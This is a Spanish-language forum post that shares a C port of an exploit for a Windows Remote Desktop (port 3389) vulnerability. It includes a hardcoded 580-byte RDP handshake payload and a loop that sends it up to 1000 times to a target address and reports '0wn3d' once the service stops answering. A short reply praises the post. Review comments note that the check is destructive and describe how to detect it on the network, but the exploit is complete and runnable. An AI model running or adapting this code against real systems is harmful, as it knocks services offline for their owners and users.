Bueno, solamente hice una traducción a C... y alguna que otra modificación de un exploit chino que explota una de las últimas vulnerabilidades públicas conocidas de Windows cuando éste tiene abierto el puerto 3389 (escritorio remoto). Sin más, dejo el original en Python y su traducción a C.



#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

/*
 * hexosni: fixed 580-byte buffer that main() hands to send() in one call.
 *
 * Layout, as far as the bytes themselves show: a back-to-back series of
 * TPKT-framed records, each starting with 03 00 followed by a 16-bit
 * big-endian length (0x0013, 0x01d6, 0x000c, 0x0008, 0x000c five times,
 * 0x000b). Those length fields add up to 580, the declared array size.
 * Readable markers inside the second record: "Duca", "HOST" as 16-bit
 * characters, and the channel names "rdpdr", "cliprdr" and "rdpsnd".
 *
 * NOTE(review): this looks like the client half of an RDP connection setup
 * (an X.224 connection request followed by MCS PDUs) recorded once and
 * replayed verbatim - confirm against the protocol specification before
 * relying on that reading.
 *
 * Detection angle: the content is static and main() never reads a reply, so
 * every pass puts the same 580 bytes on the wire immediately after the TCP
 * handshake. A client that sends the whole sequence without waiting for the
 * server's answers, repeated from one source against port 3389, is a
 * signature-friendly pattern for network monitoring.
 *
 * NOTE(review): several initialisers exceed 0x7f (0xe0, 0xff, ...). Where
 * plain char is signed, that conversion is implementation-defined in C and
 * is treated as a narrowing conversion in a C++11 braced initialiser. The
 * element type is left as char because the array is passed straight to
 * send().
 */
const char hexosni[580]={0x03,0x00,0x00,0x13,0x0e,0xe0,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x01,0xd6,0x02,0xf0,0x80,0x7f,0x65,0x82,
0x01,0x94,0x04,0x01,0x01,0x04,0x01,0x01,0x01,0x01,0xff,0x30,0x19,0x02,0x04,0x00,0x00,
0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x02,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x30,0x19,0x02,0x04,0x00,0x00,0x00,0x01,0x02,
0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,
0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,0x04,0x20,0x02,
0x04,0x00,0x00,0x00,0x02,0x30,0x1c,0x02,0x02,0xff,0xff,0x02,0x02,0xfc,0x17,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x02,0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x04,0x82,0x01,0x33,
0x00,0x05,0x00,0x14,0x7c,0x00,0x01,0x81,0x2a,0x00,0x08,0x00,0x10,0x00,0x01,0xc0,0x00,
0x44,0x75,0x63,0x61,0x81,0x1c,0x01,0xc0,0xd8,0x00,0x04,0x00,0x08,0x00,0x80,0x02,0xe0,
0x01,0x01,0xca,0x03,0xaa,0x09,0x04,0x00,0x00,0xce,0x0e,0x00,0x00,0x48,0x00,0x4f,0x00,
0x53,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0xca,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x07,0x00,0x01,0x00,0x30,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,
0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x04,0xc0,0x0c,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0xc0,0x0c,0x00,
0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0xc0,0x2c,0x00,0x03,0x00,0x00,0x00,0x72,
0x64,0x70,0x64,0x72,0x00,0x00,0x00,0x00,0x00,0x80,0x80,0x63,0x6c,0x69,0x70,0x72,0x64,
0x72,0x00,0x00,0x00,0xa0,0xc0,0x72,0x64,0x70,0x73,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,
0xc0,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x04,0x01,0x00,0x01,0x00,0x03,0x00,0x00,0x08,
0x02,0xf0,0x80,0x28,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xef,0x03,
0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xeb,0x03,0x00,0x00,0x0c,0x02,0xf0,
0x80,0x38,0x00,0x06,0x03,0xec,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,
0xed,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xee,0x03,0x00,0x00,0x0b,
0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };

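/*
 * Entry point. Takes one argument, an IPv4 address in dotted notation, and
 * makes up to 1000 passes against TCP port 3389 of that host. Each pass opens
 * a new socket, connects, and writes the whole hexosni buffer with a single
 * send(); no reply is ever read.
 *
 * Verdict logic (unchanged from the original post):
 *   - connect() fails on pass 0 or 1 -> "Puerto Cerrado"
 *   - connect() fails on a later pass -> "0wn3d"
 *   - all 1000 passes connect         -> "No vulnerable"
 * The check is destructive by construction: the only positive signal it has
 * is the service ceasing to accept connections. That signal is also weak,
 * because a firewall, a rate limit or a connection cap on the target makes
 * connect() fail in exactly the same way, so "0wn3d" is not proof of a crash.
 * Patch-level inventory answers the same question without an outage.
 *
 * Exit status: 1 only when all passes completed, 0 on every other path
 * (setup failure or connect failure), as in the original.
 *
 * Fixes over the original: argv[1] is no longer dereferenced when the
 * argument is missing, WSAStartup() and inet_addr() results are checked,
 * socket() failure is tested against INVALID_SOCKET instead of 0 (the old
 * test could not detect it, so a failed socket() went on to be
 * reported as a connect failure), the address structure is zero-initialised,
 * and Winsock is released on every exit path.
 */
int main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket = INVALID_SOCKET;
    struct sockaddr_in toTest = {0};
    int result;

    if (argc < 2 || argv[1] == NULL) {
        fprintf(stderr, "Uso: %s <direccion IPv4>\n",
                (argc > 0 && argv[0] != NULL) ? argv[0] : "programa");
        return 0;
    }

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        fprintf(stderr, "WSAStartup fallo\n");
        return 0;
    }

    /* The destination never changes between passes, so build it once. */
    toTest.sin_family = AF_INET;
    toTest.sin_port = htons(3389);
    toTest.sin_addr.s_addr = inet_addr(argv[1]);
    if (toTest.sin_addr.s_addr == INADDR_NONE) {
        /* inet_addr() signals an unparsable address with INADDR_NONE. */
        fprintf(stderr, "Direccion no valida: %s\n", argv[1]);
        WSACleanup();
        return 0;
    }

    printf("Testeando %s...", argv[1]);
    for (int i = 0; i < 1000; i++)
    {
        printf(".");

        /*
         * NOTE(review): the handle from the previous pass is overwritten
         * here without closesocket(), so only the last socket is released
         * before exit. Left as in the original so the connection pattern
         * seen by the peer stays what the post produced.
         */
        hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (hSocket == INVALID_SOCKET) {
            fprintf(stderr, "\nsocket() fallo\n");
            WSACleanup();
            return 0;
        }

        result = connect(hSocket, (SOCKADDR*)&toTest, sizeof(toTest));
        if (result != 0)
        {
            /* Any connect failure lands here; see the verdict caveat above. */
            if (i > 1)
                printf("\n0wn3d");
            else
                printf("\nPuerto Cerrado");

            closesocket(hSocket);
            WSACleanup();
            return 0;
        }

        /* The send() result is stored but, as in the original, not acted on. */
        result = send(hSocket, hexosni, sizeof(hexosni), 0);
    }

    printf("\nNo vulnerable");

    closesocket(hSocket);
    WSACleanup();
    return 1;
}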
Salud
Increíble... tengo que probarlo en casa con alguna de mis "tostadoras"...
Felicidades por tomarte el tiempo de traducirlo a C/C++ y dejarlo para todos aquí...

¡Saludos!...
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
